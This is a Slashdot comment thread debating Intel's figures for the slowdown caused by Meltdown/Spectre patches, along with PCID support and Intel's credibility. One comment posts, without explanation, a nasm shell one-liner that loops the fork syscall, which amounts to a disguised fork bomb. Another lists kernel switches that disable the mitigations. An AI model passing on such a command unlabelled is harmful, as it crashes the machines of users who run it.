Slashdot Mirror
Intel Says Chip-Security Fixes Leave PCs No More Than 10% Slower (axios.com)
Intel trying to defuse concern that fixes to widespread chip security vulnerabilities will slow computers, released test results late Wednesday showing that personal computers won't be affected much and promised more information on servers. From a report: The chipmaker published a table of data showing that older processors handled typical tasks 10 percent slower at most, after being updated with security patches. The information covered three generations of processors, going back to 2015, running Microsoft's Windows 10 and Windows 7 computer operating systems. Further reporting: Intel, Microsoft offer differing views on impact of chip flaw
Intel was knowingly breaking security to make their crap seem faster.
my US state's sales tax was 5% and it went up to 6% a few years ago. Everyone was pissed by a 1% change
That's a 20% change.
Nice try but the only thing which matter is whatever the statement is true or not.
Intel got billions of reasons to want to spread an image where this doesn't matter much.
Others may have less of a reason. But sure both sides could choose their data and try to exaggerate.
These people lied about every aspect of each of these major vulnerabilities. 10% is whatever, that's bad but worse is that NOBODY CAN TRUST INTEL WHATSOEVER, and they are the market leader.
Their obfuscation of the meltdown issue is unreasonably bad management, and their CEO sold a ton of shares right as the company secretly found out a year ago? The combination is absolutely toxic.
Clean house or watch it burn.
According to their chart, he oldest CPU they tested is 2.5 years old. Giving that some more proactive businesses have a 3+ year retention rate on hardware, "older" is hardly the word i'd use.
I.e. the 6700K.
I.e. all the chips have PCID
It's a bit hazy when PCID and INVPCID became supported.
This says PCID was first supported in Westmere
https://www.realworldtech.com/...
Another long overdue improvement to the page tables is the Processor Context ID (PCID). The PCID is a field in each TLB entry that associates a given page to a process. Previously, Intel's TLB could only contain entries from a single process and whenever the CR3 register was written (e.g. a context switch), the TLB was flushed. The PCID lets pages from different processes safely inhabit the TLB together, so that CR3 writes no longer flush the TLB. Whenever a process tries to access a page in memory, the PCID is checked to determine whether the page is actually mapped into the process' address space; if the PCID does not match then a TLB miss occurred. This is very much analogous to Intel's VPID, which enables the TLB to contain pages from different virtual machines and avoid TLB flushes during VM transitions.
The LWN patch says
http://lkml.iu.edu/hypermail/l...
PCIDs are generally available on Sandybridge and newer CPUs. However,
the accompanying INVPCID instruction did not become available until
Haswell (the ones with "v4", or called fourth-generation Core). This
instruction allows non-current-PCID TLB entries to be flushed without
switching CR3 and global pages to be flushed without a double
MOV-to-CR4.
I.e. it'd be interesting to see what happens on a CPU old enough not to support enough of PCID/INVPCID to optimized KPTI.
The claims of >10% hits are all for these old CPUs.
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;
Is 10 percent "at most" supposed to be reassuring?
This posting is provided 'AS IS' without warranty of any kind, implied or otherwise.
https://newsroom.intel.com/edi...
https://newsroom.intel.com/wp-...
i7 8700K Windows 10 SSD
SYSMark 2014 SE Responsiveness 88%
So even then it's a larger impact than 10%. On the latest processor. But the system used had their 600p SSD which is really slow. How about the 960 Pro or their Optane stuff?
As for what the responsiveness test actually test I don't know (may be possible to google that) but file-performance and virtualization may be worse.
There will be cases where the impact is beyond 10%, a 10% average would be pretty crappy. Mind you that you can get a B350 board and a Ryzen 5 1600 processor for about half the price of a Z370 board and an Intel i7 8700K.
If Intel is admitting a 10% slowdown then it must be much much larger. Because Intel and benchmarks don't live in reality.
after the way, last week, that they put it about that the problems affected all chips from all manufacturers to the same degree. They showed themselves to have better skills at sophistry that chip design.
After an OSX update a real world compile of a project that takes around two minutes to complete, too almost exactly the same amount of time, or slightly faster... since compilation involves lots of small files and system calls I would expect it to be harder hit than most tasks. However because they had a partial Meltdown patch in around December, not sure if we would see much of an effect... no-one in December complained about slowdowns from the OSX update at that time though either.
I don't think things most people do will be that affected by the patch.
"There is more worth loving than we have strength to love." - Brian Jay Stanley
I'm still not clear on if the slowdown is due to the per-OS workaround, or if Intel is talking about their eventual fix to the hardware/firmware problem causing the slowdown...TFA seems to indicate a "fix" to Windows OS' specifically, which would imply the per-OS workaround.
Anyone?
The relevant base to calculate from depends on what you're focused on.
Take an increase of sales tax from 5% to 6%. If you're focused on how much money you're giving to your local government, 20% is the correct figure to use. If you're focused on the effective change in total prices, 1% is the correct figure to use.
What computer users are naturally focused on is the amount of CPU capacity available for work. A 10% reduction in that is significant, but not catastrophic for most users. In fact many might not ever see any perceptible difference. However, in computer performance there is a powerful, non-linear difference between "just barely enough" and "not quite enough" resources. That means some users are bound to experience this marginal reduction in power as a dramatic difference on some workloads.
Post may contain irony: discontinue use if experiencing mood swings, nausea or elevated blood pressure.
And this is why one shouldn't argue on the Internet: there are a lot of anonymous idiots.
I despise Intel's ME sleazyness as much as anyone, but ME has nothing to do with Meltdown or Spectre.
If you wanted to argue that ME is tangentially related because it's a backdoor that might allow someone to then use Meltdown to attack a machine then that sounds very plausible to me, but again, that's only tangentially related and also has nothing to do with performance of Intel's chips.
I don't think there is a small amount of Intel chippery prior to 2015 running around. I'm probably an outlier, but mine is from 2008, (c) 2007.
Slashdot: Playing Favorites Since 1997
just set the flag and get your speed back
I don't claim to be any kind of semiconductor engineer, but I am a customer that paid for something, and post-facto have a choice between insecure, or less performance than I paid for.
If you think this is fine, then you are either a paid shill or a deluded fanboy.
Slashdot still doesnâ(TM)t support Unicode after it was added to the HTML standard in 1997.
Well, I'm no shill (and am no longer on Intel's payroll) but am a fanboi.
That said, the position you and Intel are in is commonly referred to by its acronym:
F.U.B.A.R.
There is no realistic recourse for Intel to offer that would satisfy the majority of the install base.
Full replacement at cost is likely to leave a lot of people very angry, and devastate Intel's Fiscal Year, but it is likely the best possible outcome.
Trying to make Intel replace everything affected for free (like with the FDIV bug) is a non starter. Intel can't likely even fab the old chips any more, and even if they could it would still require a redesign, so it's a non-starter. Giving everyone new chips would not be like for like, so you have issues where old software won't run, but is still required, also a non-starter. Additionally, both those options would likely bankrupt the company entirely, meaning people *still* wouldn't get replacements, and you'd have 100K freshly unemployed.
The most likely outcome I see is a rebate/coupon towards the purchase of any system containing a new Intel CPU from any vendor where the dollar value of the rebate is tied to the age/sku of the old CPU, with no or soft requirements to return the old CPU.
What would you (as a consumer) expect?
I likely won't get squat, since all my CPUs are samples that employees were given at various times, or bought via employee purchase channels.
whois gawk date unzip strip find touch finger mount join nice man top fsck grep eject more yes exit umount sleep dump
Yeah, except that Intel admits this is a flaw.
Why are you trying to shift blame that even Intel is (reluctantly) accepting to someone else?
Exaggeration isn't necessary. Even taking Intel at their word, that 10% differential has been their selling point for years. That means the very reason people bought Intel over the competitor is now bunk. At the very least, consumers are due a rebate, and that only (barely) addresses the lost value to those consumers, to say nothing about the damage Intel caused to its competitors in peddling this lie.
The 10% figure sure sounds negligible... until you give it more than five seconds of critical thought. Any way you slice it, Intel reaped illegitimate profits. And instead of making it right, they're busy trying to discredit the very people who have supported them over the years: their customers. This is the gold standard of how not to handle a situation like this.
A 10% reduction in that is significant, but not catastrophic for most users.
That 10% is also an average, with some loads seeing a greater hit. I imagine the people on the tail end of the distribution are going to be very unhappy. Also, Intel is only considering processors from the last 3 years, whereas Microsoft has stated publicly that older processors see an even greater hit.
Most enterprises replace their equipment on a 2-4 year cycle, depending on the business. For them, 3-year-old processors are either trash or on the chopping block for the next tech refresh. They will grumble, but they won't really care once the frenzy of patching is done. Home users---especially those on a budgets---are more likely to run into the larger performance hits that Intel isn't discussing.
---
According to the latest ruleset, this post should be modded as Vorpal Flamebait +5.
Intel can't likely even fab the old chips any more, and even if they could it would still require a redesign, so it's a non-starter.
I disagree. They would only need to do one redesign, because the architecture is the same across many different chip families. And why the flaw stretches back to 1995 in the first place.
The bigger question would be to repackage the chips to the various sockets (and voltages) where they may no longer have the specific packaging machines in place to do so.
But this is Intel with the world's best engineers. If they say they can't do it, it will give the appearance that they are being lazy and dragging their feet because they need to protect the stock sell their CEO had back in November.
On the other hand, if they really did have the best engineers eager to get the job done, they might see this as a way to create new technology that they could turn around and sell that could perhaps also extend the lifetime of legacy systems.
People should be upset for being forced to be on an upgrade mill anyway!
Take the cheese to sickbay, the doctor should see it as soon as possible - B'Elanna Torres, "Learning Curve"
On Red Hat they can be disabled by kernel command line switches: noibrs, noibpb, and nopti. REF: https://access.redhat.com/arti...
I believe there are similar kernel command line switches for a lot of other distros though you'll have to Google them yourself.